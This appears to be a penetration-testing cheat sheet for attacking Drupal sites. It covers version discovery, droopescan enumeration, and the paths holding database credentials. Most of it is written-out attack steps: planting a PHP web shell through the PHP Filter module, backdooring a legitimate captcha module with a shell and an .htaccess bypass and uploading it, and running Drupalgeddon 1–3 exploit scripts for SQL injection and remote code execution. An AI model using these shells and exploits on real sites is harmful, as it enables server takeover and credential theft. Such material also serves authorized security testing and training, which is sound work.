Drupal

Discovery

# Meta tag
curl -s http://TARGET | grep 'Generator.*Drupal'

# CHANGELOG.txt (version)
curl -s http://TARGET/CHANGELOG.txt | head

# Node-based URLs (common indicator)
/node/1
/node/2

# Login page
/user/login

Enumeration Tools

droopescan

# Install
pip install droopescan

# Scan
droopescan scan drupal -u http://TARGET

PHP Filter Module RCE (Drupal < 8)

Login as admin
Enable PHP Filter: Modules → PHP Filter → Save
Create content: Content → Add content → Basic page
Add PHP shell in body:

<?php system($_GET['cmd']); ?>

Set Text format to PHP code
Save and access:

curl http://TARGET/node/3?cmd=id

PHP Filter Module (Drupal 8+)

Module not installed by default. Upload manually:

# Download module
wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

# Upload via: Administration → Reports → Available updates
# Then enable and use as above

Backdoored Module Upload

Create Malicious Module

# Download legit module
wget https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

# Create shell.php
echo '<?php system($_GET["cmd"]); ?>' > captcha/shell.php

# Create .htaccess (bypass /modules protection)
cat > captcha/.htaccess << 'EOF'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
EOF

# Repackage
tar cvf captcha.tar.gz captcha/

Upload and Execute

Manage → Extend → + Install new module
Upload captcha.tar.gz
Access shell:

curl http://TARGET/modules/captcha/shell.php?cmd=id

Drupalgeddon (CVE-2014-3704)

Affects: Drupal 7.0 - 7.31

Pre-auth SQLi to create admin user:

# Exploit
python2.7 drupalgeddon.py -t http://TARGET -u hacker -p hacker

# Then login and enable PHP Filter for RCE

PoC: https://www.exploit-db.com/exploits/34992

Drupalgeddon2 (CVE-2018-7600)

Affects: Drupal < 7.58, < 8.5.1

Unauthenticated RCE:

# Ruby exploit
ruby drupalgeddon2.rb http://TARGET

# Python exploit
python3 drupalgeddon2.py http://TARGET -c 'id'

PoC: https://github.com/dreadlocked/Drupalgeddon2

Drupalgeddon3 (CVE-2018-7602)

Affects: Drupal 7.x, 8.x

Authenticated RCE (requires any user account):

python3 drupalgeddon3.py http://TARGET username password 'id'

Important Paths

Path

Description

/sites/default/settings.php

DB credentials

/sites/default/files/

Uploaded files

/modules/

Modules directory

/CHANGELOG.txt

Version info

/user/login

/admin

Admin panel

Config File Location

# Database credentials
/sites/default/settings.php

# Contains:
$databases['default']['default'] = array(
  'database' => 'drupal',
  'username' => 'drupaluser',
  'password' => 'password123',
);

PreviousJoomla NextSplunk

Last updated 25 days ago

hashtagDiscovery

hashtagEnumeration Tools

hashtagdroopescan

hashtagPHP Filter Module RCE (Drupal < 8)

hashtagPHP Filter Module (Drupal 8+)

hashtagBackdoored Module Upload

hashtagCreate Malicious Module

hashtagUpload and Execute

hashtagDrupalgeddon (CVE-2014-3704)

hashtagDrupalgeddon2 (CVE-2018-7600)

hashtagDrupalgeddon3 (CVE-2018-7602)

hashtagImportant Paths

hashtagConfig File Location